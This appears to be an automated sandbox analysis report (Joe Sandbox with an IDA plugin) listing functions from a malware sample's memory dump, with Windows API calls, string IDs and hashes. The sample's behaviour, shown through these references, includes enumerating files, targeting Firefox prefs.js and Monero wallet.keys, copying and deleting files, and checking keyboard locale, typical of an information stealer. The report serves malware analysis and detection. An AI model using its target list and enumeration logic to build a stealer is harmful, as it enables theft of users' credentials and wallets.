                                • Source File: 00000000.00000002.1747144020.0000000000DC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_dc0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Find$FileHeaplstrcatlstrlen$AllocateCloseFirstNextProcesswsprintf
                                • String ID: %s\%s$%s\*
                                • API String ID: 671575355-2848263008
                                • Opcode ID: 35e76eb55861e102cf3a7eab7b7c7dac8c28738ce24e6668a4ff95f9e09e0a47
                                • Instruction ID: 97d7fcbffa2062f121eb3fe5265976133c91bfaf3a98daab80ef13950320f135
                                • Opcode Fuzzy Hash: 35e76eb55861e102cf3a7eab7b7c7dac8c28738ce24e6668a4ff95f9e09e0a47
                                • Instruction Fuzzy Hash: 695153B5650218ABC721EB70DC89FED737CEB58300F404589B64A93144EB79DB858FB1
                                APIs
                                • wsprintfA.USER32 ref: 00DD3EC3
                                • FindFirstFileA.KERNEL32(?,?), ref: 00DD3EDA
                                • StrCmpCA.SHLWAPI(?,00DE0FAC), ref: 00DD3F08
                                • StrCmpCA.SHLWAPI(?,00DE0FB0), ref: 00DD3F1E
                                • FindNextFileA.KERNEL32(000000FF,?), ref: 00DD406C
                                • FindClose.KERNEL32(000000FF), ref: 00DD4081
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1747144020.0000000000DC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_dc0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Find$File$CloseFirstNextwsprintf
                                • String ID: %s\%s
                                • API String ID: 180737720-4073750446
                                • Opcode ID: be804ab72987160e8b3875d77149ac22a1db8b4d3cc0dc1fd658326abb6bf306
                                • Instruction ID: f93aca3704cd80cb8a72d12a55391accabea81d6fe143e5b55ba4bd5ec4905ba
                                • Opcode Fuzzy Hash: be804ab72987160e8b3875d77149ac22a1db8b4d3cc0dc1fd658326abb6bf306
                                • Instruction Fuzzy Hash: 3E5131B6900218ABCB25EBB0DC85EEA737CFB44300F048589B65997144DB75DB898FB1
                                APIs
                                • wsprintfA.USER32 ref: 00DCED3E
                                • FindFirstFileA.KERNEL32(?,?), ref: 00DCED55
                                • StrCmpCA.SHLWAPI(?,00DE1538), ref: 00DCEDAB
                                • StrCmpCA.SHLWAPI(?,00DE153C), ref: 00DCEDC1
                                • FindNextFileA.KERNEL32(000000FF,?), ref: 00DCF2AE
                                • FindClose.KERNEL32(000000FF), ref: 00DCF2C3
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1747144020.0000000000DC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_dc0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Find$File$CloseFirstNextwsprintf
                                • String ID: %s\*.*
                                • API String ID: 180737720-1013718255
                                • Opcode ID: 50e1e785d7c3279dc90783b800fa125629a32ca9bf49290aa4afcb61de0edd15
                                • Instruction ID: 9219940acbd3bdd0c41823479c0ba4e14091861313259fb4f9c50a35e92dba74
                                • Opcode Fuzzy Hash: 50e1e785d7c3279dc90783b800fa125629a32ca9bf49290aa4afcb61de0edd15
                                • Instruction Fuzzy Hash: 76E1F2719111689ADB65FB64DC92EEE733CEF54300F40819AB40A62192EF306F8ADF75
                                APIs
                                  • Part of subcall function 00DDA740: lstrcpy.KERNEL32(00DE0E17,00000000), ref: 00DDA788
                                  • Part of subcall function 00DDA920: lstrcpy.KERNEL32(00000000,?), ref: 00DDA972
                                  • Part of subcall function 00DDA920: lstrcat.KERNEL32(00000000), ref: 00DDA982
                                  • Part of subcall function 00DDA9B0: lstrlen.KERNEL32(?,01629208,?,\Monero\wallet.keys,00DE0E17), ref: 00DDA9C5
                                  • Part of subcall function 00DDA9B0: lstrcpy.KERNEL32(00000000), ref: 00DDAA04
                                  • Part of subcall function 00DDA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00DDAA12
                                  • Part of subcall function 00DDA8A0: lstrcpy.KERNEL32(?,00DE0E17), ref: 00DDA905
                                • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,00DE15B8,00DE0D96), ref: 00DCF71E
                                • StrCmpCA.SHLWAPI(?,00DE15BC), ref: 00DCF76F
                                • StrCmpCA.SHLWAPI(?,00DE15C0), ref: 00DCF785
                                • FindNextFileA.KERNEL32(000000FF,?), ref: 00DCFAB1
                                • FindClose.KERNEL32(000000FF), ref: 00DCFAC3
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1747144020.0000000000DC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_dc0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                • String ID: prefs.js
                                • API String ID: 3334442632-3783873740
                                • Opcode ID: 578948fd1d04d5408046a242daff5ab68e445669aaa5b32a1d6b6f7b5ae5a1a3
                                • Instruction ID: 9fa6697630afd5be629f5d352cea9f54725b434160fbf180651556fb976e449a
                                • Opcode Fuzzy Hash: 578948fd1d04d5408046a242daff5ab68e445669aaa5b32a1d6b6f7b5ae5a1a3
                                • Instruction Fuzzy Hash: 3BB122719002559BDB24FB64DC95FEE7379EF54300F4085A9A80A97281EF31AB49CFB2
                                APIs
                                  • Part of subcall function 00DDA740: lstrcpy.KERNEL32(00DE0E17,00000000), ref: 00DDA788
                                • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,00DE510C,?,?,?,00DE51B4,?,?,00000000,?,00000000), ref: 00DC1923
                                • StrCmpCA.SHLWAPI(?,00DE525C), ref: 00DC1973
                                • StrCmpCA.SHLWAPI(?,00DE5304), ref: 00DC1989
                                • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00DC1D40
                                • DeleteFileA.KERNEL32(00000000), ref: 00DC1DCA
                                • FindNextFileA.KERNEL32(000000FF,?), ref: 00DC1E20
                                • FindClose.KERNEL32(000000FF), ref: 00DC1E32
                                  • Part of subcall function 00DDA920: lstrcpy.KERNEL32(00000000,?), ref: 00DDA972
                                  • Part of subcall function 00DDA920: lstrcat.KERNEL32(00000000), ref: 00DDA982
                                  • Part of subcall function 00DDA9B0: lstrlen.KERNEL32(?,01629208,?,\Monero\wallet.keys,00DE0E17), ref: 00DDA9C5
                                  • Part of subcall function 00DDA9B0: lstrcpy.KERNEL32(00000000), ref: 00DDAA04
                                  • Part of subcall function 00DDA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00DDAA12
                                  • Part of subcall function 00DDA8A0: lstrcpy.KERNEL32(?,00DE0E17), ref: 00DDA905
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1747144020.0000000000DC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_dc0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextlstrlen
                                • String ID: \*.*
                                • API String ID: 1415058207-1173974218
                                • Opcode ID: 5e70d1ebe07703d7c217f664ffb3f62fa1bdc7e227083379126e2c16e757f2a4
                                • Instruction ID: b779077937ad02a211508f2603657e687219180df00a9760a474a08884c68534
                                • Opcode Fuzzy Hash: 5e70d1ebe07703d7c217f664ffb3f62fa1bdc7e227083379126e2c16e757f2a4
                                • Instruction Fuzzy Hash: 511223719501689BCB15FB64DCA6EEE7378EF54300F40819AB50A62291EF306F89DFB1
                                APIs
                                  • Part of subcall function 00DDA740: lstrcpy.KERNEL32(00DE0E17,00000000), ref: 00DDA788
                                  • Part of subcall function 00DDA9B0: lstrlen.KERNEL32(?,01629208,?,\Monero\wallet.keys,00DE0E17), ref: 00DDA9C5
                                  • Part of subcall function 00DDA9B0: lstrcpy.KERNEL32(00000000), ref: 00DDAA04
                                  • Part of subcall function 00DDA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00DDAA12
                                  • Part of subcall function 00DDA8A0: lstrcpy.KERNEL32(?,00DE0E17), ref: 00DDA905
                                • FindFirstFileA.KERNEL32(00000000,?,00000000,?,\*.*,00DE0C2E), ref: 00DCDE5E
                                • StrCmpCA.SHLWAPI(?,00DE14C8), ref: 00DCDEAE
                                • StrCmpCA.SHLWAPI(?,00DE14CC), ref: 00DCDEC4
                                • FindNextFileA.KERNEL32(000000FF,?), ref: 00DCE3E0
                                • FindClose.KERNEL32(000000FF), ref: 00DCE3F2
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1747144020.0000000000DC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_dc0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Findlstrcpy$File$CloseFirstNextlstrcatlstrlen
                                • String ID: \*.*
                                • API String ID: 2325840235-1173974218
                                • Opcode ID: 6d6b21276010afdc706320ce5078c4fb7b15297a775e4fc10a259c4efdf12333
                                • Instruction ID: a48da552db07bd66b28a2caf685261e18fed149c6d56062e5146eb182f543379
                                • Opcode Fuzzy Hash: 6d6b21276010afdc706320ce5078c4fb7b15297a775e4fc10a259c4efdf12333
                                • Instruction Fuzzy Hash: 81F19B719501699ADB25FB64CC96EEE7338FF54300F8081DBA40A62191EF306B8ADF75
                                APIs
                                  • Part of subcall function 00DDA740: lstrcpy.KERNEL32(00DE0E17,00000000), ref: 00DDA788
                                  • Part of subcall function 00DDA920: lstrcpy.KERNEL32(00000000,?), ref: 00DDA972
                                  • Part of subcall function 00DDA920: lstrcat.KERNEL32(00000000), ref: 00DDA982
                                  • Part of subcall function 00DDA9B0: lstrlen.KERNEL32(?,01629208,?,\Monero\wallet.keys,00DE0E17), ref: 00DDA9C5
                                  • Part of subcall function 00DDA9B0: lstrcpy.KERNEL32(00000000), ref: 00DDAA04
                                  • Part of subcall function 00DDA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00DDAA12
                                  • Part of subcall function 00DDA8A0: lstrcpy.KERNEL32(?,00DE0E17), ref: 00DDA905
                                • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,00DE14B0,00DE0C2A), ref: 00DCDAEB
                                • StrCmpCA.SHLWAPI(?,00DE14B4), ref: 00DCDB33
                                • StrCmpCA.SHLWAPI(?,00DE14B8), ref: 00DCDB49
                                • FindNextFileA.KERNEL32(000000FF,?), ref: 00DCDDCC
                                • FindClose.KERNEL32(000000FF), ref: 00DCDDDE
                                Memory Dump Source
                                • Source File: 00000000.00000002.1747144020.0000000000DC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_dc0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                • String ID:
                                • API String ID: 3334442632-0
                                • Opcode ID: 3299ce473db52c72403e6cda19aa441c766e37d125d3630bf3bff5fb2e2056cb
                                • Instruction ID: 103b0ff7391b69c045d0e170aaae2f2eae9395c59ec9992e3e70fb3cc5d2ba30
                                • Opcode Fuzzy Hash: 3299ce473db52c72403e6cda19aa441c766e37d125d3630bf3bff5fb2e2056cb
                                • Instruction Fuzzy Hash: 2A912472A00215ABCB14FB74DC56EED737DEF84300F40C569B94A97285EE349B098BB2
                                APIs
                                  • Part of subcall function 00DDA740: lstrcpy.KERNEL32(00DE0E17,00000000), ref: 00DDA788
                                • GetKeyboardLayoutList.USER32(00000000,00000000,00DE05AF), ref: 00DD7BE1
                                • LocalAlloc.KERNEL32(00000040,?), ref: 00DD7BF9
                                • GetKeyboardLayoutList.USER32(?,00000000), ref: 00DD7C0D
                                • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 00DD7C62
                                • LocalFree.KERNEL32(00000000), ref: 00DD7D22
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1747144020.0000000000DC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                 • Associated: 00000000.00000002.1747124751.0000000000DC0000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747144020.0000000000E71000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747144020.0000000000E7D000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747144020.0000000000EA2000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747144020.000000000100A000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747340780.000000000101E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747340780.00000000011A1000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747340780.000000000127B000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747340780.000000000129F000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747340780.00000000012A6000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747340780.00000000012B5000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747664665.00000000012B6000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747799643.000000000144C000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747821540.000000000144D000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_dc0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
                                • String ID: /
                                • API String ID: 3090951853-4001269591
                                • Opcode ID: 887bc0afe828f9c8df670ad4183a4dd2e6f6385d4d722901a4c540ac1aaf773a
                                • Instruction ID: c0d73ffea63b2bb2fdf41a99d8de6b9852f659c16895e34949b53be11be53487
                                • Opcode Fuzzy Hash: 887bc0afe828f9c8df670ad4183a4dd2e6f6385d4d722901a4c540ac1aaf773a
                                • Instruction Fuzzy Hash: 02413D71950218ABDB24DB58DC99BEDB774FF44700F2081DAE50962281DB746F85CFB1
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1747340780.000000000101E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                 • Associated: 00000000.00000002.1747124751.0000000000DC0000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747144020.0000000000DC1000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747144020.0000000000E71000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747144020.0000000000E7D000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747144020.0000000000EA2000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747144020.000000000100A000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747340780.00000000011A1000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747340780.000000000127B000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747340780.000000000129F000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747340780.00000000012A6000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747340780.00000000012B5000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747664665.00000000012B6000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747799643.000000000144C000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747821540.000000000144D000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_dc0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: !]}$'xq}$:I}$Puoo$RR}z$`Ao$X7
                                • API String ID: 0-1956152347
                                • Opcode ID: e89745c5747628f502dcaa0243f2bd021ecbb237858c745e8c243b1925ef6a47
                                • Instruction ID: a42bc9eaa69994df0cd89fead5eccb51636eda9ed09ff3bea56dbf8f1ede76fb
                                • Opcode Fuzzy Hash: e89745c5747628f502dcaa0243f2bd021ecbb237858c745e8c243b1925ef6a47
                                • Instruction Fuzzy Hash: 21B219F360C2149FE304AE2DDC8567AFBE9EF94220F16893DEAC4C7744E63558058796
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1747340780.000000000101E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                 • Associated: 00000000.00000002.1747124751.0000000000DC0000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747144020.0000000000DC1000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747144020.0000000000E71000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747144020.0000000000E7D000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747144020.0000000000EA2000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747144020.000000000100A000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747340780.00000000011A1000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747340780.000000000127B000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747340780.000000000129F000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747340780.00000000012A6000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747340780.00000000012B5000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747664665.00000000012B6000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747799643.000000000144C000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747821540.000000000144D000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_dc0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: \Ys9$adwr$zBp7$M_f$ngg${ss${vu
                                • API String ID: 0-2088454677
                                • Opcode ID: 10f70fb715831c1f7bc3b5578c796d2200cb4502df52871a81a575ad9a08d6a6
                                • Instruction ID: f918ca8b13964b99df5088e234edc54803e1d1602b46fc599fb693d2444f2879
                                • Opcode Fuzzy Hash: 10f70fb715831c1f7bc3b5578c796d2200cb4502df52871a81a575ad9a08d6a6
                                • Instruction Fuzzy Hash: F2B2F4F3A082149FE7046E2DEC8567AFBE9EF94720F1A493DEAC4C3344E63558448697
                                APIs
                                  • Part of subcall function 00DDA740: lstrcpy.KERNEL32(00DE0E17,00000000), ref: 00DDA788
                                  • Part of subcall function 00DDA920: lstrcpy.KERNEL32(00000000,?), ref: 00DDA972
                                  • Part of subcall function 00DDA920: lstrcat.KERNEL32(00000000), ref: 00DDA982
                                  • Part of subcall function 00DDA9B0: lstrlen.KERNEL32(?,01629208,?,\Monero\wallet.keys,00DE0E17), ref: 00DDA9C5
                                  • Part of subcall function 00DDA9B0: lstrcpy.KERNEL32(00000000), ref: 00DDAA04
                                  • Part of subcall function 00DDA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00DDAA12
                                  • Part of subcall function 00DDA8A0: lstrcpy.KERNEL32(?,00DE0E17), ref: 00DDA905
                                • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,\*.*,00DE0D73), ref: 00DCE4A2
                                • StrCmpCA.SHLWAPI(?,00DE14F8), ref: 00DCE4F2
                                • StrCmpCA.SHLWAPI(?,00DE14FC), ref: 00DCE508
                                • FindNextFileA.KERNEL32(000000FF,?), ref: 00DCEBDF
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1747144020.0000000000DC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                 • Associated: 00000000.00000002.1747124751.0000000000DC0000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747144020.0000000000E71000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747144020.0000000000E7D000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747144020.0000000000EA2000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747144020.000000000100A000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747340780.000000000101E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747340780.00000000011A1000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747340780.000000000127B000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747340780.000000000129F000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747340780.00000000012A6000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747340780.00000000012B5000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747664665.00000000012B6000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747799643.000000000144C000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747821540.000000000144D000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_dc0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$FileFindlstrcat$FirstNextlstrlen
                                • String ID: \*.*
                                • API String ID: 433455689-1173974218
                                • Opcode ID: 4b7dc40d67b6e4c9e6d071e87632e9442164f07f50364bf41019c933f9942fa0
                                • Instruction ID: 9a58d17f696be823b84bb5648857ad4e3b81ffb81a526b81966c1582b5e8a59f
                                • Opcode Fuzzy Hash: 4b7dc40d67b6e4c9e6d071e87632e9442164f07f50364bf41019c933f9942fa0
                                • Instruction Fuzzy Hash: 3D1232719101589ADB15FB64DCA6EED7338EF54300F8081AAB50A97291EF346F49CFB2
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1747340780.000000000101E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                 • Associated: 00000000.00000002.1747124751.0000000000DC0000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747144020.0000000000DC1000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747144020.0000000000E71000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747144020.0000000000E7D000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747144020.0000000000EA2000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747144020.000000000100A000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747340780.00000000011A1000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747340780.000000000127B000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747340780.000000000129F000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747340780.00000000012A6000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747340780.00000000012B5000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747664665.00000000012B6000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747799643.000000000144C000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747821540.000000000144D000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_dc0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: *io$2(c~$:Nw$Q{$\v$Z7J
                                • API String ID: 0-820486870
                                • Opcode ID: 126d83dc222f2a3c965ed756d253f63def0332d1132ae05031fe20abcae43b89
                                • Instruction ID: d5ae188a9fb722620000cdef1e8310734e9427a2dfae35b1f4c5f56dd18bd07c
                                • Opcode Fuzzy Hash: 126d83dc222f2a3c965ed756d253f63def0332d1132ae05031fe20abcae43b89
                                • Instruction Fuzzy Hash: 57B2E6F3A082049FE304AE29EC8577ABBE9EFD4720F1A453DE6C487744EA3558058697
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1747340780.000000000101E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                 • Associated: 00000000.00000002.1747124751.0000000000DC0000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747144020.0000000000DC1000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747144020.0000000000E71000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747144020.0000000000E7D000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747144020.0000000000EA2000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747144020.000000000100A000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747340780.00000000011A1000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747340780.000000000127B000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747340780.000000000129F000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747340780.00000000012A6000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747340780.00000000012B5000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747664665.00000000012B6000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747799643.000000000144C000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747821540.000000000144D000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_dc0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: =6$E_O]$_O~>$fluo$w{O6
                                • API String ID: 0-684366947
                                • Opcode ID: 497aa3fa2949e97ce556d9194b7bb7befb46e19af873463b240b6ade4116759c
                                • Instruction ID: 468fd7e8734b0b0c101e1e12d9ec99320f67e2439a1ceeba7bbbcc763a9bbd45
                                • Opcode Fuzzy Hash: 497aa3fa2949e97ce556d9194b7bb7befb46e19af873463b240b6ade4116759c
                                • Instruction Fuzzy Hash: E792E8F360C6049FE304AE6DDC8567AB7E5EF94720F1A893DEAC4C7744EA3598018687
                                APIs
                                • lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 00DCC871
                                • CryptStringToBinaryA.CRYPT32(?,00000000), ref: 00DCC87C
                                • lstrcat.KERNEL32(?,00DE0B46), ref: 00DCC943
                                • lstrcat.KERNEL32(?,00DE0B47), ref: 00DCC957
                                • lstrcat.KERNEL32(?,00DE0B4E), ref: 00DCC978
                                Memory Dump Source
                                • Source File: 00000000.00000002.1747144020.0000000000DC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                 • Associated: 00000000.00000002.1747124751.0000000000DC0000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747144020.0000000000E71000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747144020.0000000000E7D000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747144020.0000000000EA2000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747144020.000000000100A000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747340780.000000000101E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747340780.00000000011A1000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747340780.000000000127B000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747340780.000000000129F000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747340780.00000000012A6000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747340780.00000000012B5000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747664665.00000000012B6000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747799643.000000000144C000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747821540.000000000144D000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_dc0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcat$BinaryCryptStringlstrlen
                                • String ID:
                                • API String ID: 189259977-0
                                • Opcode ID: f852c5e24a0dbf73622bc3c5f2d1c32bbc27359d9e4231ca48f100e4b8219a73
                                • Instruction ID: f36523f7fb0f8732bfa144be66ee3816803abf16350899e5d1b0eb72c10f0ee3
                                • Opcode Fuzzy Hash: f852c5e24a0dbf73622bc3c5f2d1c32bbc27359d9e4231ca48f100e4b8219a73
                                • Instruction Fuzzy Hash: E7416075A1421ADFDB10DF90DC88BEEB7B8BB48304F1041A8E509A7280D7755B84CFA1
                                APIs
                                • GetProcessHeap.KERNEL32(00000008,00000400), ref: 00DC724D
